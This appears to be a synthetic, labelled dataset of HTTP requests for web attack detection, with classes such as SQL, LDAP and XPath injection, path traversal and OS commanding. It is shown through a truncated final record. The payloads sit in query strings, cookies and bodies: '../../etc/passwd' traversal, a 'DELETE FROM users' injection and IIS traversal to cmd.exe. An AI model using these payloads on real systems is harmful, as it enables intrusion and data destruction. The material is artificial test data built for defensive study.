If-Range: Thu, 14 May 09 15:46:49 UTC
Pragma: o='vihkiu'
Authorization: NTLM NmVoU3hub2xpbmFzYjRldG9IbjcxZGRpMXVjbVhpc3E=
Range: 93685-
Referer: /bsys6ia9/rmila5b/ttrseo.txt
User-Agent: 6aeen7p (dZJHm@yG)
UA-Disp: 195,8034,32
Via: 1.1 177.252.75.219
Transfer-Encoding: gzip
X-Serial-Number: 37240861433574285269

null

End - Id: 41255
Start - Id: 49830
class: XPathInjection
GET /ousbwnen2h9n.gif?kv2.njwRKkK=9&nltHtsnv=jQP%40S4&hltlds=onm8%27%5D+++++%7C++P+++%7C++++%2F%2Fuser%5B+++++name%2Ftext%28%29++++%3D+++%27roXrh&dautkszonmnoal=etzonboo79etc&et3=083481&mochaseHE=78385757&lixipfh1loOe=pah HTTP/1.1
Host: www.bebAneo.de:80
Connection: close
Accept: video/quicktime;q=0.1
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: trpcrtl-dadcnytl;q=0.5, esntt-Hisohrr, aAek-uaoasarr;q=0.5
Cache-Control: rcq0jn=r
Client-ip: 77.69.248.51
Cookie: 0sibelidrr=A8;3sittzGIYVx=ossen;btleRisinclibg=32
Cookie2: $Version="7"
Date: Wed, 24 Jun 09 03:52:37 GMT
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sun, 07 May 06 05:36:09 CET
If-Unmodified-Since: Sat, 23 Oct 04 10:59:50 CET
If-Match: "@VYXx_B.ty2TE6KS"
If-None-Match: "oaGOmk42r0VfPgn5P9kZ"
If-Range: Tue, 13 Apr 10 07:25:47 GMT
Max-Forwards: 7
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Basic bW5yb25uNzplT2VkdGg=
Range: -29302
Referer: /ii1a.bin
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: oeeasb
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 172x6984
Via: 6.9 29.60.120.148:78363, enrnre/0.7 128.196.208.61
Transfer-Encoding: coalqt; lpietfo=dipdwS
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 539 163.222.151.131 "oqahsnbhdol" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49830
Start - Id: 36381
class: PathTransversal
POST /rn3pr5e8ten.asp? HTTP/1.0
Content-Length: 167
Content-Language: a
Content-Encoding: compress
Content-MD5: b2Vud3p3Z3JjcjRudzRyOQ==
Content-Type: application/x-www-form-urlencoded
Host: www.iijhoG.gov
Connection: wOFiRg
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.2, deflate, compress
Accept-Language: *
Cache-Control: only-if-cached
Cookie: 6rh-oU7IH=5;etthdhdtp3F49=hi1uHbn8bws;0wraE6pmsadn=878;8mszAeshj=../../../../../../../../../etc/passwd;zIHQ-rgJ=?e;uoawoohTdsktl=LoeoczecytxZhmigd
Date: Sat, 29 Jul 06 01:14:49 UTC
Expect: 100-continue
If-Unmodified-Since: Wed, 19 Sep 07 01:23:30 UTC
If-None-Match: *
Max-Forwards: 5290
Pragma: no-cache
Referer: http://www.uesn.gov/ee7bs/sp1i0mdm.tiff
TE: trailers,gzip;q=0.8
User-Agent: olTmiet4wouexvgfnira
UA-Disp: 6092,769,16
Via: FTP/3.4 196.191.199.17, 9.1 217.246.56.97, FTP/1.5 146.210.51.222
X-Serial-Number: 1175084296

Raeeid1Isdula=metar>ew&Bpasswdq5BN=seavfaEbeaws&ux=tnhanl7bDfClDsE&xeaaa=m0i2sh&Rwg4V=89&lEhtma=a-y2v7yq.rI.&vtfsvwhrq=egaOnrrkc&t0NdlisA=655&0trxV8PDLWGQ=2Me3ee9de8

End - Id: 36381
Start - Id: 42307
class: SqlInjection
GET /4etN@Inaz/szaULoYvxGiB2/o.B9vjc/HjimgzCmocha-vinserttXU/ridu3/ztSihadnY/jittOu9omaltddhOhar/86tg2Yh2SBK28u/9mIa/jhhslkcoantcrtp/er31l5ds/oi6kzs.css?Ie7SloVoll1j=%27+++++OR++++%27erev%27++%3C++%27X&NGo0hm-0=czhUd0EifdzSopvOm&slxtermbla=69894&GetierLil=6188950&EfLM=msaate&mmdbarin4=8836957&soA=ymkseawa&tnLmmEg=020&rtTe7=546824627&o0ae=28552727&idtlodwszEPn=hOk%40Zr5M&ingWVa25VUo.d=899888438 HTTP/1.1
Host: www.ekne.net
Connection: iifo
Accept: */*;q=0.3
Accept-Charset: x-mac-turkish;q=0.1, windows-1255;q=0.8, windows-1255, koi8-r;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 37.43.143.81
Cookie: 1st1tFdska=iiumesIe;nkedcaytni7a=ddadmin;Enro1f=5;ndimam4dubT=odabme cs;ccgj5t=e0v
Cookie2: $Version="871"
Date: Fri, 08 Feb 08 07:20:27 CET
ETag: "NrIBh7YV-x.@lBq@zb"
Expect: mlaiiu0=atteoi
From: ebsew@sn8ns6e.de
If-Modified-Since: Sun, 19 Sep 04 19:46:45 GMT
If-Unmodified-Since: Mon, 17 Jan 05 15:48:45 GMT
If-Match: *
If-None-Match: "SLU@Ds83z2a8B-YtfJZ"
If-Range: Tue, 26 Oct 04 24:38:59 GMT
Max-Forwards: 2
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic dHZhSWJjaTpucmVVdzk=
Range: -568889,-588214
Referer: /reGtdms/are2an/wsanhlt/ue6Isee/5oo3b.swf
TE: deflate;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/0.8 (compatible; MSIE 9.5; Windows NT; Hiiu5fne; c5sS; irncoxC)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4371x6437
Via: ciay/1.9 www.ifeK.html
Transfer-Encoding: deflate
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42307
Start - Id: 38443
class: LdapInjection
GET /LmY/4Ie1KzTcopyPVgnV.jpeg?eeaEeC5se0stip=%3Fiesystem&N8ggbrefrculTSn=%29%28+++%7C++%28ut%3Dhi*%29&Eiyeclo9ahaeske=30202193&1siUedsiitaeab=stv3.%40ab6&Xyscriptu_Dnc_7Vls=p4QsUYETcS&LoIAc=aToyS HTTP/1.0
Host: 102.165.124.230
Connection: ltoe6xc
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 245.206.186.144
Cookie: c2id=2i1oa
Cookie2: $Version="1"
Date: Sun, 25 Nov 07 05:43:51 UTC
ETag: W/"BpcspexLKViXdbtMsF0W"
Expect: naonssut=qvdo
From: rrdhloR@le2p.gov
If-Modified-Since: Sun, 11 Dec 05 09:46:08 CET
If-Unmodified-Since: Thu, 05 Feb 04 05:33:56 CET
If-Match: "lYDjuaJTlLKJXd0A47"
If-None-Match: *
If-Range: Thu, 10 May 07 12:25:04 UTC
Max-Forwards: 518
MIME-Version: 3.3
Pragma: t=iqamirR
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest cnonce="ohrEir"
Range: 86309-
Referer: http://www.ivuna.gov/ans6u/h3rreqr/eaeid.mp3
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/3.8 (compatible; MSIE 0.5; Linux i386; 4odswn; eomiq)
UA-CPU: 68000
UA-Disp: 664,920,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 040x944
Via: FTP/1.9 21.187.156.67
Transfer-Encoding: compress
Upgrade: tunet/0.9, arant/2.6, wts/9.0, gdp/6.1
Warning: 437 66.2.246.8 "Ubflauttlali" "Tue, 23 Jun 09 09:36:33 GMT"
X-Forwarded-For: 62.19.165.119
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38443
Start - Id: 39118
class: LdapInjection
POST /m5e2tg/eC8t3TaCo@y7Wfw7Nh7n/rsigei3/hNYhxqSI3PZ1YcH@/Oz4select-uconnectUl/aoned7lN48fta/tNQra0_n_@D61nAlGbX/c1UgLUH.LvHALKEsUPjO/o1W.L4oIMDIi7t/eV9M5.ZS73H/jOtlQdavoshwOceb.asmx? HTTP/1.1
Content-Length: 88
Content-Language: pkb6uo,hsc
Content-Encoding: compress
Content-Location: /kegEdae/s67eitp/ahoa/ziasjd7/ryiq.wmn
Content-MD5: VG9lTmVidGdlYXVhYTZ0Nw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Nov 07 23:39:31 CET
Last-Modified: Sat, 13 Feb 10 17:12:00 GMT
Host: 100.171.251.81:80
Connection: close
Accept: video/quicktime, image/jpeg;q=0.7, image/*;q=0.4
Accept-Charset: iso-8859-7;q=0.7, gb2312;q=0.9
Accept-Encoding: compress, identity;q=0.7, deflate;q=0.2, compress;q=0.9
Accept-Language: rd-hntaret;q=0.9, sw-eitrths, uc-eAWxeM;q=0.8
Cache-Control: no-store
Client-ip: 188.4.183.10
Cookie: eOerecssi=5]i;fnseed7=ht0ee)(&(objectClass=  i9ei*);nvmg=90585983;xstyledocumentNT4ol=dbhACOc
Date: Sat, 13 Mar 04 03:55:12 CET
ETag: "iduT0H1mvYTsopAytp"
Expect: oygkxg=dhdio
From: odttunS@5IalqSfc.de
If-Modified-Since: Sat, 31 Jan 09 20:53:51 UTC
If-Unmodified-Since: Mon, 22 Mar 04 04:40:16 UTC
If-Match: *
If-None-Match: "14-i_Nx3lSrE.2m"
If-Range: *
Max-Forwards: 3
Pragma: ncbfn='rstomor'
Authorization: NTLM aTRFZWVhZXNoaXNqc2lzbWVsb3Rvb3FzYnJOaVB0ZWF0dXl0eQ==
Referer: http://www.EcrouotE.fr/irfurrd.pl
TE: chunked;q=0.2,deflate
User-Agent: Mozilla/9.0 (Windows; U; WinNT 8.5; qo-ue; rv:5.5.0) Gecko/00629633
UA-CPU: StrongARM
UA-Color: color16
UA-Pixels: 7687x288
Via: FTP/4.2 22.216.185.184
X-Forwarded-For: 83.44.70.121
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

l1apfndO3p=ijhnconnect &vineee6rh8=05130527&eieBihi=53056634&habr=otandas/alike|qeri

End - Id: 39118
Start - Id: 37174
class: LdapInjection
GET /s8qsatLi0Ri2iht/9sam/sIx8w/386W5xyeWShzn6EDW/2Zj0o0/rd/hX2t/AFzmZ8kjRh/hidotg9taMaiwns/9mmogyo.jpeg?19htUc=e3hijkdcOF2&MdaC=tojiframence6+t&q8=wuaooOlblIedeARndl&dea9l=sBU_f&SshnenelyCartte=nq5&nhRwjoqcfusn=852195&rehuqaefvu0ur=Od%3Dnsysteml%28rt%3DLebshtpassc%24t&tawnen=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&tlurgePnwuoeig=64231 HTTP/1.0
Host: 159.32.118.233:80
Connection: close
Accept: application/zip;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.1, deflate;q=0.0, gzip, identity, gzip;q=0.3
Accept-Language: 5dib-itra, xzSrO-zwcaAo, ea-fivl;q=0.5, CsFahtl-8b9mvs
Cache-Control: max-stale=20003
Client-ip: 188.238.110.194
Cookie: itHDspcrdafb=zsl
Cookie2: $Version="45"
Date: Mon, 26 Jul 04 22:33:29 CET
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: pooroeeh=nA3Te;syttsT
From: aheoexc5@cnna.gov
If-Modified-Since: Fri, 24 Jul 09 22:57:41 GMT
If-Unmodified-Since: Sat, 29 Oct 05 13:09:30 CET
If-Match: "gNHabTFCB4ceHSJ1f9c1"
If-None-Match: "WQ_-1Hx2FOdPcyy03L"
If-Range: "Z4G3T@eRECE7Qfy"
Max-Forwards: 77
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic YW90bmE6ZW16MnBhbg==
Authorization: Digest nonce
Range: 0-
Referer: http://www.tnetpon.de/tdntyin/dperp/pqhnnrS.png
TE: deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 5.2; tr-ta; rv:0.0.9) Gecko/11244157
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 5.1 www.ne2sm9oh.html, 6.5 www.ngxis.htm, YOsv/2.9 www.htHA.htm
Transfer-Encoding: deflate
Upgrade: Tri/4.5
Warning: 662 www.decsE.html "thSoIrea" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 175208593
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37174
Start - Id: 42126
class: SqlInjection
GET /txyiwmbiaatse97dm/uJI0a7kalxJKz/aVc4XAUdroFXafEk/gvza1Uect/saeMSauojL1R0ll3siw/etoiarnrcreAi10d/iUb2ue4R3dOba_L4l/eh/xqiywI.ncJzNLeHD.jpg?IogZFpassthruPF_=t%25iIa%3FTOoeehpom8&4ataineUnhyu=9576890&ateqLsehoNeufu8=609253&bDRD1vWchild=tAr7r&MeihKJA=nswcs%27++++%29%3B++DELETE+++++FROM+users+++++WHERE+upper%28username%29+++++%3D+++++upper%28%27admin&7xxzcopyetcVu2=iv+i&sy1Zeal=782698541&lhrh=%7Cxml5ed%3Brrusystemehttps%7E%29nk&icbhdmnbsh0=olndi&4E9a4bk=i8Z&oinvbjmc=876866&eEspitcpbs=140852263 HTTP/1.1
Host: www.agLo.fr
Connection: iroRhoo
Accept: application/*, video/quicktime;q=0.5
Accept-Charset: shift_jis;q=0.6
Accept-Encoding: 
Accept-Language: suN-niasis, co-orssy
Cache-Control: max-age=72644
Client-ip: 29.95.16.146
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="994"
Date: Tue, 31 Aug 04 19:19:17 UTC
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: islI@rcdrtQr.org
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Wed, 28 Jul 04 08:29:55 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Mar 05 01:24:02 UTC
Max-Forwards: 7222
MIME-Version: 7.0
Pragma: cyr=omapefe
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth-int
Range: 80-3804,023297-91,09-
Referer: http://www.kEIicby.de/OfAa/sitltscm/les8/MlNsh.mdb
TE: trailers
Trailer: Range
User-Agent: osraoi (bX26sZ; p148Cty0; mxN@K8; 0bYxv.hri; tcl4DPm)
UA-CPU: MIPS
UA-Disp: 3899,512,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1285x9347
Via: HTTP/0.1 www.xang.gif, iay/2.4 160.19.139.125:6
Transfer-Encoding: identity
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 210 www.mTetdThm.shtml "LTt1suesam" "Fri, 22 Feb 08 23:40:02 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42126
Start - Id: 45678
class: PathTransversal
GET /llosamrn/stHepxb0m5oanhdeei/scGiESGcat/eNdFhf/tkChed-_Di/miholaEactcvbdi/nAE1oot1weMob/utwftMNUVvXDYfMNW4@/oeseheoc/ma9areede/dMEcOP_7WB.pl?iEcri87tesfLe=npepasswd&kWedNcoqnn=iwenoTxdenNep&aTsxsutn1tr7=9&roeoriseas=3eRhDo7mda&hat=mrihhneuaohgwa&40hssedni2bht=tXROD4OGP5B2&hetnaoe=+%40&RgryF_H=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&_Nrmh0uniontT1Abin=t2u+edlNchildtdropr&h0fi5av3oort=930 HTTP/1.0
Host: www.odgc0ied.be
Connection: close
Accept: text/plain;q=0.9, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 2-a7s2;q=0.8, at6z-e5ne;q=0.5
Cache-Control: no-store
Client-ip: 10.24.0.201
Cookie: of=49
Cookie2: $Version="61"
Date: Fri, 11 Apr 08 23:32:30 GMT
ETag: W/"pe70GW5KbMX6A54uVdd"
Expect: bEeiah5h=l1sAo
From: esIpsioy@eehlxsang.it
If-Modified-Since: Mon, 12 Feb 07 19:55:59 CET
If-Unmodified-Since: Sat, 03 Sep 05 24:00:47 GMT
If-Match: *
If-None-Match: "cUIgVCA7eKWAFvfKX"
If-Range: Mon, 23 Apr 07 11:48:01 CET
Max-Forwards: 323
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: Basic bXRzZWk6bmx0aHFpaG0=
Range: -368400,7896-37283
Referer: /3hetlni7/ueRja6oh/yw3a/oo2e.gif
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: t5yH10 http://www.neaaim0.uk
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 488x430
Via: 4.3 www.aRihe.css
Transfer-Encoding: deflate
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 227 16.42.111.183 "as3aaqiao" "Mon, 07 Jun 04 08:18:13 CET"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45678
Start - Id: 44396
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 125.22.198.33
Connection: close
Accept: image/*;q=0.0, text/*, application/zip
Accept-Charset: iso-8859-5, shift_jis, iso-8859-4
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.6
Cache-Control: 3syoo=ol
Client-ip: 145.27.27.144
Cookie: shjevaSH=nph-eTEe;noaqfw4ro=dzPciawn7nhncaottr
Cookie2: $Version="30"
Date: Mon, 08 Jun 09 23:16:06 GMT
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Sat, 03 Nov 07 13:46:17 GMT
If-Unmodified-Since: Fri, 04 Dec 09 17:53:33 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Dec 04 14:20:45 CET
Max-Forwards: 9
MIME-Version: 6.5
Pragma: tHp68='Ns'
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: rtrc iusenooo=galrlc
Range: 3952-044,25518-
Referer: /tresgb.nsf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.8 (compatible; MSIE 6.9; Open BSD i386; 4iseanhb; wo7Re)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8335x3340
Via: nYtEs/3.0 202.146.128.200, HTTP/8.1 129.237.246.7, 6.6 www.Ilagleor.html
Transfer-Encoding: p1kiqs
Upgrade: asneah/1.8, akhg/1.6
Warning: 345 www.zdydE.js:508 "oogntaebhaEnWh" "Sat, 14 Oct 06 08:34:42 GMT"
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44396
Start - Id: 38401
class: LdapInjection
GET /lx9aPD.zZnK3N/e@Pf7/nasUs6hMTnrsxh/Douqljue00aasl/NZ4/divjeDimglikejk/eHEIRBfS6fzjGVINbwgH/reoS9/rXN.VLPvT6Jm7d/dWvbyF/aed.cgi?aLasetroyneao0n=alf&elpodanquatN=9457%29%28%26%28objectClass%3DohTr%29%28%7C%28sn%3D+vt%29%28cn%3Du++++J*%29%29&ss=%7Esw&fbti=yi%2Fezd HTTP/1.1
Host: www.nhbaRx3z2.ch
Connection: ntacFhya
Accept: image/png, audio/*
Accept-Charset: windows-1252, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: oor-snys6hh;q=0.7, ey-ghg, o-louadt, ere8s-Tepax, dEehnoh-ihtne;q=0.0
Cache-Control: max-age=3646
Client-ip: 214.154.43.120
Cookie: mpb0=stboot.ini ;aed5nSmTaOms=6089;noTepiadztor=88;asveen2iaq38hoe=childo:updatel;2G5orZselectDKU=22811365;mweceeu9at19OE=02614635
Cookie2: $Version="47"
Date: Tue, 17 Jan 06 06:03:53 UTC
ETag: W/"PEY2C1nlHh2cP9Zzo"
Expect: 100-continue
From: bahiT@etI8o.net
If-Modified-Since: Thu, 12 Mar 09 18:13:00 GMT
If-Unmodified-Since: Wed, 28 Nov 07 13:09:17 GMT
If-Match: *
If-None-Match: "aArLISgjwm7L9c4IRDy"
If-Range: Mon, 10 Jan 05 24:27:15 UTC
Max-Forwards: 1
MIME-Version: 0.1
Pragma: yeb='twjx2ffi'
Proxy-Authorization: Basic Z25peXFzaDpld3NkcnA=
Authorization: Digest nonce
Range: -96373
Referer: /tgtsE.php4
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/8.5 (compatible; Konqueror/7.3; Win98; fyNOaleim)
UA-CPU: Sparc
UA-Disp: 011,9897,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7262x7113
Via: 4.7 www.tfshphsh.tiff, Ttya/9.0 236.166.141.165:21, HTTP/8.3 www.2jdo2.js
Transfer-Encoding: gzip
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38401
Start - Id: 37877
class: LdapInjection
GET /8Nj-/2bJ5eniEsio/tibYz/O7@zsrXM-Qy/hV3AF8Z1wOkJ1MX/eowh8ed63ria.msf?Eefgkcbh4nS=bczn&DKLsqLU3=L%2Bnct&rsR8=q+l+xtrjgroup+byvs&DEc3Htnflessh=y0qKa_bq7Yfp&o4aaTmkwge0bZ=009160815&_EU.Gt0U=30&whOao=r&tdvf6lewEAit=stdinhrshxeitEirnns&jegd1chi=4295&azaetebaftoa=asN6m%29%28%26%28objectClass++++%3D+sa*%29&mmaokcouua7gN=17777&ltdOhee=u&lc=srs8a&a7nsnxa=5 HTTP/1.0
Host: 1.189.71.145
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.6, compress;q=0.9, deflate;q=0.1, gzip, identity;q=0.0
Accept-Language: 5Ias-rtnmehr;q=0.7, tust-spexi, afsyh1-fdilTo;q=0.6, t-84oeeoal;q=0.2, n-a
Cache-Control: max-stale
Client-ip: 243.107.176.204
Cookie: ota8otis=usuN;edmpbmtw=67557775;.SlCKtyx0rb5=ew$im;rndebatoc=98028;sus=zVKhA--
Cookie2: $Version="4"
Date: Thu, 07 May 09 13:52:57 CET
ETag: W/"0TSBrKN@19qGWxFKmS7"
Expect: ooauyOdi
From: ftCe@ttlwnsel.it
If-Modified-Since: Sat, 10 Apr 04 15:25:38 GMT
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: "j03sBA-skXanwNiI"
If-None-Match: "M9sH0o2P18l28ICX"
If-Range: "zKBd-dXLriP5Begtu6Vb"
Max-Forwards: 316
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: Digest nc=EC41B5Fc
Range: 89-,46-035533,8-609
Referer: /mdwyae/ChTdp/hete/oatxtcH/ni0f.jpeg
TE: deflate,gzip,gzip;q=0.4
Trailer: If-Modified-Since
User-Agent: hmassrh3a/7.0
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 3.7 86.20.72.23, FTP/8.4 123.71.26.255:985
Transfer-Encoding: compress
Upgrade: 82r/8.3, ehi/8.7
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37877
Start - Id: 44463
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.1
Host: 199.39.69.140
Connection: srct6t
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: itCh-5tatvch4;q=0.4, Edmset-X
Cache-Control: max-stale
Client-ip: 1.111.16.222
Cookie: rmsta=5386057;iet=jvoqsa
Cookie2: $Version="3"
Date: Fri, 04 Dec 09 08:26:49 UTC
ETag: W/"HOeVhuxH1l6dtpGLM"
Expect: 100-continue
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 19 Aug 09 21:49:32 UTC
If-Unmodified-Since: Sun, 10 Jul 05 24:31:39 CET
If-Match: "chCm2R5CdRZa_Cb"
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: Wed, 03 Aug 05 11:26:20 GMT
Max-Forwards: 414
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: ettity hOti=5AIs
Range: 6-02287,72753-
Referer: http://efr7.gov/etnsniid.pl
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/0.0 (X11; U; Open BSD i586 0.6; 8t-ur; rv:7.4.7) Gecko/28845048
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/4.0 187.115.150.91, 7.7 www.gft9E.css
Transfer-Encoding: gzip
Upgrade: n7n4g/9.8, isEasp/0.6, dOHut/7.0, ywG/7.6, sesne/6.3
Warning: 500 103.24.153.176 "urwer2tml4" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44463
Start - Id: 38993
class: LdapInjection
GET /ineamrorltAdc9Qe/tTr9sp/l-qI5eds7H/tmpSycxmlsyC-i0N1/iilaht/pCCibke30V2zzijK/KycrdsaaNdh7i.gif?e6atTnnewbsbuct=tirhoferen6&0sztetiSrey=riuhsadelete6fbvatwgetofaes+&J2I3Nz-iedropB=vsh%5Ce+laws5o&cohsso=%3Ecvoefne6i8+%5D&eyachpZr=2545449&nttetu=%29++%28%7C%28displayName%3Dhad*%29+++%28name+%3D+had*+++%29%28++++mail%3Dhad*++++%29&C-Ga=acekdmg+c2s+L HTTP/1.0
Host: www.adts.gov
Connection: close
Accept: video/quicktime;q=0.6, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, deflate, gzip;q=0.9
Accept-Language: *;q=0.2
Cache-Control: max-stale=6
Client-ip: 94.71.216.42
Cookie: ht2S=6565872;otij=8298564089;2wk1n9f=aoptS
Cookie2: $Version="51"
Date: Thu, 28 Aug 08 02:31:44 UTC
ETag: "9iXp@tJghwelCND"
Expect: 100-continue
From: xuahq@twsoetroa.com
If-Modified-Since: Fri, 02 Apr 04 17:43:34 CET
If-Unmodified-Since: Tue, 07 Mar 06 19:54:27 GMT
If-Match: "OVFBg2OB0sVJ6FLD7te"
If-None-Match: *
If-Range: "mswrVjepbj3FJ48Gp9O"
Max-Forwards: 708
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: NTLM cmM2RmFwZTF4cGt0c3NFQU9xaVdydGh6T2VhU292cXM=
Range: 2-,-247703
Referer: /ewsoahlf/e4eIla/X6tmpe/Oslys3/annq.shtml
TE: trailers
Trailer: Range
User-Agent: 7qLefTjdk http://www.sdnoeye.de
UA-CPU: MIPS
UA-OS: Windows NT
UA-Pixels: 8193x847
Via: HTTP/6.7 176.17.248.123, 9.3 www.vbhw.jpeg, 4.4 www.dnsR3he.js
Transfer-Encoding: identity
Upgrade: ir0/8.9, deh7/6.4
Warning: 690 www.hd6EutI.tiff "hneytet" 
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38993
Start - Id: 42372
class: SqlInjection
GET /oliht/6thLtpiYdt6nwantoS/i8DrO6vioeUlqvgCr9xH/hsJg8Dg/ocqtauhltaS5e.jpg?zXUWwindow.openjlbetweensaq=%27+++++union++++select+++sum%28re%29++from++ous--&oeerse=712991 HTTP/1.1
Host: 9.230.39.234
Connection: tcadv
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.7, compress
Accept-Language: h2i5bs-hbR;q=0.9, fyuslse-lte
Cache-Control: max-age=2783
Client-ip: 23.45.21.183
Cookie: gensyeomdUned=238;on4Uith=isameoOn9%ad;ntdIr=rIz]
Cookie2: $Version="6"
